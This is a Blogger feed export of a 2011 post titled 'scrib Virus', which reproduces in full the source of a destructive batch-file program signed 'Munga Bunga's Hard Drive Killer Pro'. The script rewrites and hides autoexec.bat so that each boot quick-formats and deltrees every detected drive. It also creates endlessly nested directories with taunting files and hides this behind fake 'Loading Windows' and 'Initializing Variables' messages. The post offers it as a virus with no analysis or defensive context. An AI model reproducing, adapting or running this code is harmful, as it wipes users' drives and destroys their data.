<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4662554093426848451</id><updated>2012-03-06T11:51:01.422-08:00</updated><title type='text'>MicroHac</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://microhac.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4662554093426848451/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://microhac.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>MicroHac</name><uri>http://www.blogger.com/profile/13861019348655972827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>1</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4662554093426848451.post-5458185325202758930</id><published>2011-02-25T15:23:00.000-08:00</published><updated>2011-02-25T15:25:25.938-08:00</updated><title type='text'>scrib Virus</title><content type='html'>@echo off&lt;br /&gt;rem This program is dedecated to a very special person that does not want to be named.&lt;br /&gt;:start&lt;br /&gt;cls&lt;br /&gt;echo PLEASE WAIT WHILE PROGRAM LOADS . . .&lt;br /&gt;call attrib -r -h c:\autoexec.bat &gt;nul&lt;br /&gt;echo @echo off &gt;c:\autoexec.bat&lt;br /&gt;echo call format c: /q /u /autotest &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;call attrib +r +h c:\autoexec.bat &gt;nul&lt;br /&gt;&lt;br /&gt;rem Drive checking and assigning the valid drives to the drive variable.&lt;br /&gt;&lt;br /&gt;set drive=&lt;br /&gt;set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z&lt;br /&gt;&lt;br /&gt;rem code insertion for Drive Checking takes place here.&lt;br /&gt;rem drivechk.bat is the file name under the root directory.&lt;br /&gt;rem As far as the drive detection and drive variable settings, don't worry about how it&lt;br /&gt;rem works, it's damn to complicated for the average or even the expert batch programmer.&lt;br /&gt;rem Except for Tom Lavedas.&lt;br /&gt;&lt;br /&gt;echo @echo off &gt;drivechk.bat&lt;br /&gt;echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" &gt; nul &gt;{t}.bat&lt;br /&gt;%comspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.bat&lt;br /&gt;del {t}.bat&lt;br /&gt;echo if errorlevel 1 goto enddc &gt;&gt;drivechk.bat&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;echo PLEASE WAIT WHILE PROGRAM LOADS . . .&lt;br /&gt;&lt;br /&gt;rem When errorlevel is 1, then the above is not true, if 0, then it's true.&lt;br /&gt;rem Opposite of binary rules. If 0, it will elaps to the next command.&lt;br /&gt;&lt;br /&gt;echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" &gt; nul &gt;{t}.bat&lt;br /&gt;%comspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.bat&lt;br /&gt;del {t}.bat&lt;br /&gt;echo if errorlevel 1 goto enddc &gt;&gt;drivechk.bat&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;echo PLEASE WAIT WHILE PROGRAM LOADS . . .&lt;br /&gt;&lt;br /&gt;rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.&lt;br /&gt;rem if errorlevel is 0, then it will elaps to the next command.&lt;br /&gt;&lt;br /&gt;echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" &gt; nul &gt;{t}.bat&lt;br /&gt;%comspec% /e:2048 /c {t}.bat &gt;&gt;drivechk.bat&lt;br /&gt;del {t}.bat&lt;br /&gt;echo if errorlevel 1 set drive=%%drive%% %%1 &gt;&gt;drivechk.bat&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;echo PLEASE WAIT WHILE PROGRAM LOADS . . .&lt;br /&gt;&lt;br /&gt;rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.&lt;br /&gt;rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.&lt;br /&gt;&lt;br /&gt;echo :enddc &gt;&gt;drivechk.bat&lt;br /&gt;&lt;br /&gt;rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".&lt;br /&gt;&lt;br /&gt;rem Now we will use the program drivechk.bat to attain valid drive information.&lt;br /&gt;&lt;br /&gt;:testdrv&lt;br /&gt;&lt;br /&gt;for %%a in (%alldrive%) do call drivechk.bat %%a &gt;nul&lt;br /&gt;if %drive%.==. set drive=c&lt;br /&gt;del drivechk.bat &gt;nul&lt;br /&gt;&lt;br /&gt;:form_del&lt;br /&gt;call attrib -r -h c:\autoexec.bat &gt;nul&lt;br /&gt;echo @echo off &gt;c:\autoexec.bat&lt;br /&gt;echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo cls &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo cls &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo for %%%%a in (%drive%) call deltree /y %%%%a:\ &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo cls &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo cls &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo cls &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo for %%%%a in (%drive%) call deltree /y %%%%a:\ &gt;nul &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo cd\ &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo cls &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo Welcome to the land of death. Munga Bunga's Hard Drive Killer Pro Version 4.0. &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo  echo If you ran this file, then sorry, I just made it. The purpose of  this program is to tell you the following. . . &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo 1. To make people aware that security should not be taken for granted. &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo  echo 3. This breach of your security will benefit you in the long-run,  so don't worry. Think about it.&gt;&gt;c:\autoexec.bat&lt;br /&gt;&lt;br /&gt;echo echo. &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo Regards, &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo. &gt;&gt;c:\autoexec.bat&lt;br /&gt;echo echo Munga Bunga &gt;&gt;c:\autoexec.bat&lt;br /&gt;call attrib +r +h c:\autoexec.bat&lt;br /&gt;&lt;br /&gt;:makedir&lt;br /&gt;if exist c:\temp.bat attrib -r -h c:\temp.bat &gt;nul&lt;br /&gt;echo @echo off &gt;c:\temp.bat&lt;br /&gt;echo %%1:\ &gt;&gt;c:\temp.bat&lt;br /&gt;echo cd\ &gt;&gt;c:\temp.bat&lt;br /&gt;echo :startmd &gt;&gt;c:\temp.bat&lt;br /&gt;echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a &gt;&gt;c:\temp.bat&lt;br /&gt;echo for %%%%a in ("&gt;ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! &gt;&gt;c:\temp.bat&lt;br /&gt;echo  if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%  %2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2  \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\% %2\%%2\nul goto  startmd &gt;&gt;c:\temp.bat&lt;br /&gt;call attrib +r +h c:\temp.bat &gt;nul&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;echo Initializing Variables . . .&lt;br /&gt;rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.&lt;br /&gt;for %%a in (%drive%) do call format %%a: /q /u /autotest &gt;nul&lt;br /&gt;cls&lt;br /&gt;echo Initializing Variables . . .&lt;br /&gt;echo Validating Data . . .&lt;br /&gt;for %%a in (%drive%) do call c:\temp.bat %%a Munga &gt;nul&lt;br /&gt;cls&lt;br /&gt;echo Initializing Variables . . .&lt;br /&gt;echo Validating Data . . .&lt;br /&gt;echo Analyzing System Structure . . .&lt;br /&gt;for %%a in (%drive%) call attrib -r -h %%a:\ /S &gt;nul&lt;br /&gt;call attrib +r +h c:\temp.bat &gt;nul&lt;br /&gt;call attrib +r +h c:\autoexec.bat &gt;nul&lt;br /&gt;cls&lt;br /&gt;echo Initializing Variables . . .&lt;br /&gt;echo Validating Data . . .&lt;br /&gt;echo Analyzing System Structure . . .&lt;br /&gt;echo Initializing Application . . .&lt;br /&gt;&lt;br /&gt;for %%a in (%drive%) call deltree /y %%a:\*. &gt;nul&lt;br /&gt;cls&lt;br /&gt;echo Initializing Variables . . .&lt;br /&gt;echo Validating Data . . .&lt;br /&gt;echo Analyzing System Structure . . .&lt;br /&gt;echo Initializing Application . . .&lt;br /&gt;echo Starting Application . . .&lt;br /&gt;for %%a in (%drive%) do call c:\temp.bat %%a Munga &gt;nul&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;echo Thank you for using a Munga Bunga product.&lt;br /&gt;echo.&lt;br /&gt;echo Here is a joke for you . . .&lt;br /&gt;echo.&lt;br /&gt;echo Q). What's the worst thing about being an egg?&lt;br /&gt;echo A). You only get laid once.&lt;br /&gt;echo.&lt;br /&gt;echo Don't you just love that one?&lt;br /&gt;echo.&lt;br /&gt;echo Regards,&lt;br /&gt;echo.&lt;br /&gt;echo Munga Bunga&lt;br /&gt;&lt;br /&gt;:end&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4662554093426848451-5458185325202758930?l=microhac.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://microhac.blogspot.com/feeds/5458185325202758930/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://microhac.blogspot.com/2011/02/scrib-virus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4662554093426848451/posts/default/5458185325202758930'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4662554093426848451/posts/default/5458185325202758930'/><link rel='alternate' type='text/html' href='http://microhac.blogspot.com/2011/02/scrib-virus.html' title='scrib Virus'/><author><name>MicroHac</name><uri>http://www.blogger.com/profile/13861019348655972827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
